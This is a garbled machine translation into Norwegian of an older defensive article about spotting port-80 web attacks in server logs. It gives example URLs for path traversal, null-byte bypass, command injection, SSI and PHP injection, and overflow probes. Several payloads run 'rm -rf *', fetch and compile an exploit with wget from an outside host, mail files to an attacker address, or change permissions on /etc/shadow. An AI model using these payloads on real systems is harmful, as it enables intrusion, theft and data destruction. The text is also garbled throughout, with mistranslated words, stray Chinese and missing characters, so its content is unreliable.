I. Sammendrag
II. En detaljert beskrivelse av
III. Ytterligere
IV. Smitteeffekter analyse
V. transkoding
VI. Konklusjon
[Sammendrag]
nettsted 80 som standard service-porten, på ulike sikkerhetsproblemer holde den ut av utgivelsen, noen av disse sikkerhetsproblemene kan en angriper å få enda systemadministratoren tillatelse til å gå inn i stedet, er følgende Zenomorph port 80 angrep på noen av sporene forskning, og fortelle deg hvordan du finner problemer fra loggen postene.
[Detail]
Her delvis gjennom en rekke Liezi vises på web-servere og applikasjoner på deres generelle angrep, og spor, som bare representerer Liezi stort angrep, er det ingen liste over alle form for angrep, denne delen vil detaljert beskrivelse av hvilken rolle hvert angrep, og hvordan du kan utnytte disse sikkerhetsproblemene å angripe.
(1) "." ".." Og "..." forespørsel
Spor av disse angrepene er svært vanlig for web-applikasjoner og web-server, som brukes til å tillate at en angriper eller orm-virus program for å endre webserveren vei, for å få tilgang til lukkede områder. De fleste CGI programmer med disse feilene, ".." forespørsel.
Eksempel:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Dette viser angriperen Liezi forespørselen mosd denne filen, hvis angriperen muligheten gjennombruddet webserveren rotkatalog, deretter få mer informasjon og for å skaffe ytterligere privilegier.
(2) "% 20" forespørsel
% 20 er den hex verdien at de 16 områder, men dette betyr ikke at du kan bruke noe, men når du viser loggen vil finne det, andre web server applikasjonen kjører på denne karakteren kan være effektivt implementert Derfor bør du lese nøye gjennom loggen. På den annen side, kan be noen ganger hjelpe å utføre en kommando.
Eksempel:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
Dette Liezi viser angriper å kjøre en unix kommando, liste hele katalogen av dokumenter forespurt, forårsaker at angriperen kan få tilgang til viktige filer på systemet, for å hjelpe ham videre gi betingelsene for å få privilegier.
(3) "% 00" forespørsel
% 00 sa 16-byte heksadesimale tom, klarte han å lure web søknad, og be om andre typer filer.
Eksempler:
http://host/cgi-bin/lame.cgi?page=index.html
Dette kan være en gyldig forespørsel i maskinen, hvis en angriper klar over denne forespørselen var vellykket, vil han videre se etter cgi prosedyrer.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Kanskje cgi programmet ikke aksepterer denne forespørselen fordi det er forespørselen om å sjekke filtype, for eksempel: html.shtml eller andre typer filer. De fleste programmer vil fortelle deg den valgte filtypen er ugyldig, denne gangen vil fortelle angriperen forespørsler filen må være et tegn på en fil type suffiks, slik at en angriper kan få systemet banen, filnavn, noe som resulterer i systemet mer sensitiv informasjon
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Oppmerksomhet til denne forespørselen, vil den jukse cgi program som dette dokumentet er å finne akseptable filtyper, noen programmer av effektive inspeksjoner som dumme forespørsel fil, som er vanlig metoder for angriperen.
(4) "|" forespørsel
Dette er en pipe tegn, i UNIX-system, en forespørsel om hjelp i gjennomføringen av flere kommandoer systemet samtidig.
Eksempel:
# Cat access_log | grep-i ".."
(Denne kommandoen vil vise loggen i ".." forespørsel, vanligvis brukt i angrep og ormer funnet)
Ofte finner at mange web-applikasjoner bruker dette tegnet, dette også fører til falske alarmer i IDS loggene.
I undersøkelser av søknaden, så fordelen av å redusere falske alarmer til innbrudd oppdagelse systemer.
Her er noen av Lieh-tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Denne forespørselen kommandoen, følgende er noen endringer i Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc |
Denne forespørselen er oppført i unix system / etc katalog over alle filer
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20-i% 20 "lame"
Katten kommando gjennomføringen forespørsel og gjennomføringen av grep kommandoen vil også, sjekk ut "klagesang"
(5) ";" forespørselen
I unix systemer, gir dette tegnet flere kommandolinje kjøring
Eksempel:
# Id, uname-a
(Gjennomføring av id-kommandoen, etterfulgt av gjennomføring av uname-kommandoen)
Noen web-program med denne karakter, kan resultere i IDS logger en advarsel for svikt, bør du nøye sjekke web-programmet, slik at du reduserer risikoen for svikt i IDS-alarmer.
(6) " " og " " forespørselen
Bør sjekke loggene posten de to tegn, av flere grunner, er det første tegnet på at den ekstra data i dokumentet
Eksempel 1:
# Echo "din hax0red H0 H0" / etc / motd (motd be om skriftlig informasjon i dette dokumentet)
En angriper lettere kan anvende kravet som ovenfor tukling med websiden din. Slik som den berømte RDS utnytte angriperen er ofte brukt for å endre web siden.
Eksempel 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html vil du se at språket av tegn her, han også tilbrakte " "," " tegn, slike angrep kan ikke føre til at angriperen å få tilgang til systemet, forvirrede det folk tror dette er et legitimt nettsted informasjon (som fører til mennesker besøker denne linken for å gå til angriperen for å angi adressen, kan denne forespørselen bli kodet inn 16 hex-tegn i form, slik at spor av angrepene er ikke så opplagt)
(7) "!" Forespørsel
Felles språk denne karakteren forespørsel SS (Server Side Inkluder) jeg angrep, angriperen forvirret hvis en bruker klikker på angriperens tilkoblingsinnstillingene, og det samme som ovenfor.
Eksempel:
http://host1/something.php =
Den Lieh-tzu er den angriper kan gjøre det til en fil på nettstedet host2 fra host1 vises ovenfor (selvfølgelig, krever besøkende til å besøke angriperens tilkoblingsinnstillingene. Denne forespørselen kan omgjøres til 16 hex koding maske, ikke lett å finne)
Samtidig kan denne tilnærmingen også kjøre kommandoen myndighet nettsted
Eksempel:
http://host/something.php =
Den Lieh-kjører på det eksterne systemet "id"-kommandoen, vil det vise nettsiden brukerens id, er vanligvis "nobody" eller "www"
Dette skjemaet kan også inkludert skjulte filer.
Eksempel:
http://host/something.php =
Den skjulte filer. Htpasswd vil ikke bli vist, vil Apache nekte å etablere slike regler til. Ht skjema, og SSI logoen vil omgå slike begrensninger, og føre til sikkerhetsproblemer
(8) "," Be
Slike angrep brukes til å prøve å fjernt sette inn en PHP web søknadsprosessen, kan det tillate kjøring rekkefølge, avhengig av server-innstillinger, og annet arbeid av en rekke faktorer (slik som php for å sette sikkerhetsmodus)
Eksempel: http://host/something.php = passthru ("id ");?
I noen enkle php program, kan det være å nettsted på det eksterne systemet brukeren rettigheter til å utføre lokale kommandoen
(9) "` "forespørselen
Denne tegnet senere brukes til å utføre kommandoer i Perl, er det tegn i webapplikasjonen ikke ofte brukt, så hvis du ser det i loggen din, bør være svært forsiktig
Eksempel:
http://host/something.cgi = `id`
Skriv et perl cgi aktuelle programmet ville føre til gjennomføringen av id-kommandoen
[Videre]
Følgende avsnitt vil diskutere implementeringen av flere angrep kunne kommandere, sammen med dokumenter forespurte, og hvis du har en ekstern kommando kjøring feil, bør det være hvordan å sjekke funnet. Denne delen er bare for å gi deg en god idé, og fortelle systemet hva som skjer, angriperne prøve å angripe systemet ditt spor, men viser ikke alle angriper å bruke kommandoer og forespørsler.
"/ Bin / ls"
Denne kommandoen forespørsler hele banen, i mange av web-applikasjoner har denne smutthull, om du logger deg på mange steder Zhezhong forespørsel, er det mulig for store bestillinger Yuan Cheng kjøring sårbarheten, men ikke nødvendigvis et problem kan også være falsk alarm. Nok en gang minnet, web-applikasjon skrevet (cgi, asp, php ... osv.) er grunnlaget for sikkerheten
Eksempel:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Dette er en vinduer av skallet, hvis en angriper å få tilgang til og kjøre dette skriptet på serveren innstillingene under de vilkår som tillatt i Windows-maskin kan gjøre noe, mye av ormer er gjennom port 80, kommunikasjon til den eksterne maskinen
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Dette er en to binære filer, sine problemer og / bin / ls, som, hvis du logger deg på mange steder en slik anmodning, er det mulig for store ekstern kjøring kommando sårbarheten, men ikke nødvendigvis et problem kan også være falsk alarm.
Den vil vise hvilken del som tilhører hvilken bruker og gruppe
Eksempel:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Denne kommandoen kan slette filer uten riktig bruk er svært farlig
Eksempler:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf% 20 * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-rf% 20 *;
"Wget og TFTP" kommandoen
Disse kommandoene er ofte den angriper kan få ytterligere rettigheter til å laste ned filer, er wget en unix kommando under, kan brukes til å laste ned backdoors, er TFTP under kommando unix og NT, brukes til å laste ned filen. Noen IIS ormer sprer seg selv ved å TFTP å kopiere viruset til andre maskiner
Eksempler:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// host / cgi-bin / bad.cgi? DOH = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"Cat"-kommandoen
Denne kommandoen brukes til å vise innholdet i filen, som brukes til å lese viktig informasjon, for eksempel konfigurasjonsfiler, passord filer, kreditt-filer og dokumenter du kan tenke deg
Eksempler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? DOH = cat% 20/etc/motd;
"Echo"-kommandoen
Denne kommandoen brukes til å skrive data til filen, som "index.html"
Eksempler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-# kiwi% 20was% 20here"% 20 % 200day.txt | http://host/cgi-bin/bad.cgi?doh=echo% 20 "fc-# kiwi% 20was% 20here"% 20 % 200day.txt;
"Ps" kommandoen
Viser de kjører prosessen, forteller angriperen at en ekstern vert som kjører programvaren for å få en ide om sikkerhetsspørsmål, å skaffe ytterligere tillatelser
Eksempler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? DOH = ps% 20-aux;
"Kill og killall" kommandoen
Unix-systemer for å drepe denne prosessen, en angriper kan bruke denne kommandoen til å stoppe systemet tjenester og prosesser kan også slette spor av angriperen, noen utnytte vil produsere en masse barn prosesser
Eksempler: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Uname" kommandoen
Denne kommandoen forteller angriperen den eksterne maskinen navn, i noen tid, gjennom dette nettstedet, for å vite hvilke ISP, en angriper som kan besøkes i dag. Uname-a til å be om normalt, vil disse bli registrert i loggfilen
Eksempler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-a | http://host/cgi-bin/bad. cgi? DOH = uname% 20-en;
"Kopi gcc, Perl, Python, etc ..." samling / tolkning av kommandoen
Angriper gjennom wget eller TFTP nedlasting utnytte, og bruke cc, GCC kompilatoren til å kompilere dette inn i et kjørbart program, og ytterligere tilgangsrettigheter
Eksempler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? DOH = gcc% 20Phantasmp.c;. / a.out% 20-p% 2,031,337;
Hvis du viser loggene som finnes i "Perl" python "Disse instruksjonene kan være en ekstern angriper å laste ned perl, python skript, og prøvde å få privilegier av lokale
"Mail"-kommandoen
Angripere bruker ofte denne kommandoen systemet, noen viktige dokumenter til angriperens egen postkasse, men også villig til e-post bombe angrepene er utført
Eksempler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, osv ..." og andre kommandoer
Unix systemer for å tillate dem å endre filrettigheter
chown = tillater innstilling filen eieren chmod = gjør det mulig å sette filrettighetene chgrp = tillater eieren å endre gruppen rettigheter på filer chsh = lov til å endre brukerens skall
Eksempler: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? DOH = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" filen
Dette er systemets passord-fil, vanligvis skygge av, og tillater ikke å se den krypterte passord, men for en angriper som kan vite hva som er gyldig bruker, og systemets absolutte banen, området navn og annen informasjon, som vanligvis er av skyggen av, slik at angriperen vil normalt se / etc / shadow-fil
"/ Etc / master.passwd"
Denne filen er BSD systemet passordet filen, inneholder den krypterte passord, er filen på root-kontoen bare lese-bare, og noen ufaglærte angripere åpnet sitt forsøk på å lese innholdet innsiden., Hvis webområdet er root privilegier for å kjøre, så angriperen er, kan vi lese innholdet innsiden, en masse problemer på systemet administrator kommer en etter en
"/ Etc / shadow"
Inneholder et passord kryptert system, lese det samme på root-kontoen, og / et / master.passwd nesten
"/ Etc / motd"
Når brukere logger inn i unix-systemet, vises informasjonen i denne "Melding av dagen" filen, gir det viktig systeminformasjon og administrator av brukeren av en rekke innstillinger, de som vil at brukerne skal se, den som ikke, inneholder også systemet versjonsinformasjonen, angriperen vanligvis se denne filen, for å forstå hva systemet kjører på angriperen, er neste steg å søke etter denne type system, utnytte og videre tilgang til systemet privilegier
"/ Etc / hosts"
Dokumentet inneholder ip-adresse og nettverksinformasjon, en angriper kan lære mer om systemet nettverksinnstillinger
"/ Usr / local / apache / conf / httpd.conf"
Dette er en Apache web server konfigurasjonen arkiv, kan en angriper forstå, slik som cgi, SSI og annen informasjon er tilgjengelig
"/ Etc / inetd.conf"
Dette er konfigurasjonsfilen inetd service, kan en angriper kan lære den eksterne maskinen starter disse tjenestene, om wrapper brukes for adgangskontroll, hvis de kjører wrapper, vil angriperen Neste sjekk "/ etc / hosts.allow" og "/ etc / hosts.deny", arkiv, og som kan endre noen innstillinger, tilgangsrettigheter
". Htpasswd,. Htaccess, og. Htgroup"
Disse filene er vanligvis brukt til nettstedet brukergodkjenning, kan en angriper vise disse filene, og tilgang til brukernavn og passord, passordet 文件. Htpasswd Pi kryptert Guo, gjennom noen enkle pause prosedyre for å dekryptere, så en angriper å få tilgang til Zhan Dianzhong beskyttede områder (vanligvis brukeren med samme brukernavn og passord, kan angriperen også besøke andre kontoen)
"Access_log og error_log"
Disse det Apache server loggfiler, angriperne ofte vise disse filene, se på de forespørslene er registrert, disse og andre forespørsler om forskjellige steder
Vanligvis vil angriperen modifisere disse loggfilene, for eksempel sin egen e-postadresse informasjon, en angriper pause ved 80 havner på systemet ditt, og backup-systemet også fungerer ikke, ingen andre opptak system 状况 innspillingen prosedyrer, som vil Detektering av inntrenging blir svært vanskelig å jobbe
"[Drive-brevet]: winntrepairsam._ eller [stasjonsbokstav]: winntrepairsam"
Windows NT-systemet passord filen, hvis den eksterne kommandoen ikke kan gjennomføres, vil angriperne vanligvis be om disse dokumentene, deretter "l0pht sprekk" av den typen passord sprengning verktøy for å knekke, hvis angriperen prøver å angripe administratorer 'passord-fil, hvis vellykket da den eksterne maskinen vil være angriperen får kontroll
[Overløp analyse]
I denne artikkelen vil jeg ikke si for mye om overløp av emnet, vil jeg gi ut hva de fenomener og spor av merke og spesielt opptatt av, en buffer er ofte angrepet av angriperen koden konvertering og vanskelig å finne andre måter å oppnå
Her er en enkel Lie Zi
Eksempel: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Dette Liezi viser angriper på et program for å sende en masse et tegn, for å teste programmet en buffer overflow, kan buffer overflow få en ekstern kommando kjøring vert tillatelser, dersom eieren har setuid og prosedyrer for roten, gjennom overløp, kan få tilgang til hele systemet, om ikke like setuid programmet, deretter overflow er bare ved å kjøre nettsidens brukerrettigheter
Her kan ikke fortelle alle omstendigheter, men du bør regelmessig sjekke logg-filen, hvis den dagen plutselig fant en masse forespørsler, men vanligvis ikke mer enn de ber om, betyr det at du er utsatt for overløp angrep, selvfølgelig, kan også være Et nytt nettverk orm angrep
[Transkoding]
Alle angrepene nevnt ovenfor forespørsel, vet angriperen vanligvis IDS systemer ofte mekanisk sjekke forespørsel, vanligvis angriperen vil bruke data konvertering verktøy for å konvertere den valgte innholdet formatet 16 band, noe som resulterer i IDS vil ignorere disse forespørslene, Vi er kjent med CGI sikkerhetsproblemet skanning verktøyet det er en god Liezi Whisker. Hvis du vise loggen over tid funnet et stort antall 16-band, og ikke noen vanlige tegn, så angriper kan prøve å bruke noen av måtene å angripe systemet
En rask måte er din loggfilen anmodning for de 16 hex, kopiere den til din nettleser, kan leseren bli omdannet til høyre forespørselen, og viste innholdet i anmodningen, hvis du ikke mot til å ta denne risikoen, en enkel mann ASCII, kan gi deg den riktige koden.
[Konklusjon]
Denne artikkelen kan ikke dekke alle de 80-portene på angrepet, men de fleste har blitt sitert mer enn den generelle angrep, og fortelle deg hvordan å sjekke loggfiler, og hvordan du legger til for eksempel antall IDS regler, skriver hennes mål er å web system administrator bør være bekymret for hva en god idé på samme tid, håper jeg denne artikkelen hjelper til web-program webutviklere å skrive bedre programmer
AV MERK: Hvis du har noen kommentarer og forslag, send en e-post admin@cgisecurity.com.